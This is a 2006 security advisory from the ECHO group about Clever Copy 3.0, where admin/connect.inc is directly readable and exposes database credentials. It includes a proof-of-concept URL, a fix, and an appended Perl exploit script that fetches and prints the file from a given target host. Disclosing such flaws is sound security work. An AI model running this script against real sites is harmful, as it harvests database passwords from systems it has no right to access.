____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO_ADV_28$2006 --------------------------------------------------------------------------- [ECHO_ADV_28$2006] Clever Copy <= 3.0 Connect.inc Critical Information Disclosure --------------------------------------------------------------------------- Author : M.Hasran Addahroni Date : April, 7th 2006 Location : Indonesia, Bali Web : http://advisories.echo.or.id/adv/adv28-K-159-2006.txt Critical Lvl : Medium --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Clever Copy version : 3.01 URL : http://clevercopy.bestdirectbuy.com/ Description : Clever Copy is a free, fully scalable web site portal and news posting system. You can run it as a very simple blog or ramp it up to a full Content Management System. It is easy to setup, use and maintain requiring no previous knowledge of web portals, blogs, php, Cms's or databases. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~~~ Critical connect.inc file in admin folder are vulnerable to direct access to view 'critical' information about the database username and password. ------------------connect.inc----------------------------------- ------------------------------------------------------------------ Its works when file *.inc not declare in httpd.conf. Poc: ~~~~~~~~~~~~ http://www.example.com/[clevercopy_path]/admin/connect.inc Solution: ~~~~~~~~~ rename connect.inc into connect.inc.php to protect this vulnerability or declare *.inc in httpd.conf --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw ~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit,FeNNi ~ newbie_hacker@yahoogroups.com ~ #aikmel #e-c-h-o @irc.dal.net --------------------------------------------------------------------------- Contact: ~~~~~~~~ K-159 || echo|staff || eufrato[at]gmail[dot]com Homepage: http://k-159.echo.or.id/ -------------------------------- [ EOF ] ---------------------------------- Perl Exploit: ~~~~~~~~~~~~ #!/usr/bin/perl # # Clever Copy <= 3.0 connect.inc Critical Information disclosures Exploit # Bug found & code by K-159 # Base on advisory at http://http://advisories.echo.or.id/adv/adv28-K-159-2006.txt # # Description : # Critical connect.inc file in admin folder are vulnerable to direct access # to view 'critical' information about the database username and password. # # # # Its works when file *.inc not declare in httpd.conf # # Poc : # http://www.example.com/[clevercopy_path]/admin/connect.inc # # usage: # perl celevercopy.pl www.target.com # # www.echo.or.id (c) 2006 # # Greetz : echo|staff, aikmel|crew, masterpop3, SinChan, sakitjiwa, etc # contact : eufrato[at]gmail.com www.echo.or.id # print "\n=======================================================\n"; print "* Clever Copy connect.inc Critical Information Disclosure Exploit by K-159 *\n"; print "* www.echo.or.id #e-c-h-o irc.dal.net *\n"; print "==========================================================\n"; require LWP::UserAgent; if(@ARGV == 1) { $target= $ARGV[0]; my $ua = LWP::UserAgent->new; $ua->agent("MSIE/6.0 Windows"); $ua->timeout(10); $ua->env_proxy; my @url = ("http://$target/admin/connect.inc"); foreach my $urlz (@url) { my $injek = $ua->get($urlz); print "\n-------------------------------\n"; if ($injek->is_success) { print $injek->content;} else {die $injek->status_line;} print "\n-------------------------------\n"; } } else { print "\n Use: perl $0 [www.target.com] \n"; }